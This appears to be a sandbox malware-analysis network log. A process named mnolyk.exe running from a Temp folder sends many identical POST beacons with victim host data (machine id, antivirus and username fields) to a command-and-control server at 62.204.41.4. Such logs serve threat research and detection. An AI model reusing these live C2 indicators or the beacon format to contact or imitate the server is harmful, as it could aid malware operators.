                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      47          192.168.2.7  49771        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:36:09.033958912 CET  479                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:09.099214077 CET  479                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      470         192.168.2.7  50198        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:05.080347061 CET  930                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:05.149249077 CET  930                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      471         192.168.2.7  50199        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:05.327038050 CET  931                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:05.389956951 CET  931                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      472         192.168.2.7  50200        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:05.567461967 CET  932                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:05.634252071 CET  932                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      473         192.168.2.7  50201        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:05.815510988 CET  933                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:05.880518913 CET  933                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      474         192.168.2.7  50202        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:06.231570005 CET  934                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:06.299165010 CET  934                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      475         192.168.2.7  50203        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:06.492873907 CET  935                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:06.557442904 CET  935                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      476         192.168.2.7  50204        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:06.733576059 CET  936                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:06.797574997 CET  936                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      477         192.168.2.7  50205        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:07.442403078 CET  937                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:07.509082079 CET  937                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      478         192.168.2.7  50206        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:07.828165054 CET  938                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:07.892654896 CET  938                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      479         192.168.2.7  50207        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:38:08.630703926 CET  939                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:08.697093964 CET  939                 IN         HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                      48          192.168.2.7  49772        62.204.41.4     80                C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp                           kBytes transferred  Direction  Data
                                                                      Feb 6, 2023 18:36:09.270270109 CET  480                 OUT        POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:09.336646080 CET | 480 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      480 | 192.168.2.7 | 50208 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:09.067569017 CET | 940 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:09.133527994 CET | 940 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      481 | 192.168.2.7 | 50209 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:09.315254927 CET | 941 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:09.380939960 CET | 941 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      482 | 192.168.2.7 | 50210 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:09.556488037 CET | 942 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:09.621283054 CET | 942 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      483 | 192.168.2.7 | 50211 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:09.797467947 CET | 943 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:09.862864971 CET | 943 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      484 | 192.168.2.7 | 50212 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:10.033407927 CET | 944 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:10.100136042 CET | 944 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      485 | 192.168.2.7 | 50213 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:10.266407967 CET | 945 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:10.331212997 CET | 945 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      486 | 192.168.2.7 | 50214 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:10.502845049 CET | 946 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:10.566845894 CET | 946 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:10 GMT
